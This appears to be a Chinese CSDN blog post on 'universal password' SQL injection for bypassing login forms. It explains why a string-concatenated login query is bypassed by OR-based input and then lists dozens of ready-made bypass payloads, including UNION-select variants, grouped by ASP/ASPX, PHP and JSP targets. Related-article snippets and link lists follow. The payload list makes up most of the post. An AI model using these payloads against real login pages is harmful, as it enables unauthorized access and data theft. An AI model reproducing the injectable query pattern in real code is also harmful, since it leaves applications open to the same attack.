万能密码

万能密码原理

原验证登陆语句:

SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'

输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:

SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'

即得到优先级关系：or<and<not，同一优先级默认从左往右计算。
(1.)上面’1’=‘1’ AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG’先计算肯定返回false,因为密码是我们乱输入的。(此处是假)
(2.)Username=‘1’ 返回假,没有用户名是1(此处是假)
(3.)1=1返回真(此处是真)
以上的结果是: 假 or 真 or假 返回真。验证通过。

万能密码

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

asp aspx万能密码

1：”or “a”=”a
2： ‘)or(‘a’=’a
3：or 1=1–
4：’or 1=1–
5：a’or’ 1=1–
6：”or 1=1–
7：’or’a’=’a
8：”or”=”a’=’a
9：’or”=’
10：’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ （替换表名admin）
密码 1
17…admin’ or ‘a’=’a 密码随便

PHP万能密码

‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1

jsp 万能密码

1’or’1’=’1
admin’ OR 1=1/*

————————————————
版权声明：本文为CSDN博主「無名之涟」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/hxhxhxhxx/article/details/108020010

sql注入之万能密码总结相关推荐

1. mysql登录框万能密码_Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]...

   在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可以 ...

2. SQL注入与万能密码登录

   今天的靶机是一个主要面向web应用程序的框架.更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入.我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜 ...

3. php密码注入,php防止sql注入之万能密码以及防范

   说什么叫sql注入呢? 就是在登录.注册.input中输入一些影响sql语句的代码 导致你的sql语句出现问题,比如说这个问题: select * from web_manage where user ...

4. SQL手工注入原理万能密码及默认密码登陆后台

   SQL手工注入原理: 下面就是比较笨的方法了==    一个一个试 (*￣rǒ￣) 针对于.asp后缀网 + ?id_  在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...

5. sql注入：万能钥匙注入

   根据提示,这道题使用sql输入,题目中说已经使用过滤,但是我们还是要试试,看看是不是所有特殊字符都被过滤了, 如图,进行尝试之后,得到结果: 可知,引号没有被过滤.所以我们可以使用万能密码. 万能密码 ...

6. SQL注入（万能句型‘ or 1=1 -‘）

   环境:mysql.PHP 数据库:  php代码 <html> <head><title>SQLInjection</title> </head& ...

7. BBSXP最新漏洞 简单注入检测 万能密码

   BBSXP最新漏洞 漏洞日期:2005年7月1日 受害版本:目前所有BBSXP 漏洞利用: 查前台密码注入语句: blog.asp?id=1%20union%20select%201,1,userpa ...

8. Wmm的学习日记（SQL注入基础）

   这周听了一节三个半小时的网课,有关sql注入,消除了我对sql注入的"恐惧",也算是浅浅入了下门吧,虽然学会了点皮毛,但是还是成就感满满,哈哈哈,从0到0.001也是一件值得庆祝的 ...

9. SQL注入原理以及预防措施

   1.SQL注入原理 就是通过利用一些查询语句的漏洞,将SQL语句传递到服务器解析并执行的一种攻击手段.SQL注入是一种注入攻击,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能 ...

最新文章

1. overlapped I/O的学习笔记
2. Keil中调试时Watch窗口变量不实时显示
3. JAVA----------------------华为机试--------------------------删除字符串中出现次数最少的字符...
4. typora高级设置字体_Mint(Linux)系统设置优化及其常用软件安装笔记
5. 220V双向TVS二极管，如何正确选型？
6. VTK：隐式布尔值用法实战
7. 安装apex报错解决
8. 20应用统计考研复试要点(part26)--简答题
9. Javascript版的Repeater控件实现
10. java模拟数据库压测_Jmeter压测工具使用总结
11. 蓝牙hci主要作用是什么_我的“我”是您的“您”：为什么为HCI精调Deixis很困难
12. 项目经理必备的8种能力，最后一个90%的PM都认同！
13. 【加拿大签证】加拿大工签/工作许可work permit 办理流程【官方详细完整，加拿大访问学者必看】
14. win10显示未插入扬声器或耳机的解决方案
15. 毕业3年，从滴滴实习到阿里P7，我整理的超全学习指南
16. 校验非空的注解@NotNull怎么取得自定义的message
17. 如何利用自定义函数把阳历转换成阴历
18. Sensor Flicker (Sensor banding现象)
19. linux云服务器配置JDK教程（博主阿里云，腾讯云亲测成功案例教程）
20. 股票入门：股票交易手续费用怎么算（转）

热门文章

1. oracle中distinct和count函数组合使用
2. 《Effective Modern C++》Item 6: Use the explicitly typed initializer idiom when auto deduces undesired
3. element UI实现el-dialog（弹框）可拖拽功能（网上借鉴）
4. 如何优雅的在 Word 中插入代码，PlanetB 的完美替代方案
5. PowerDesigner Excel导入信息
6. Onvif协议PTZ服务规范（一）PTZ Service Specification
7. 学生成绩管理系统总体设计
8. SAP FI会计科目主数据
9. linux C -- ftok函数
10. Android学习之——操作SIM卡联系人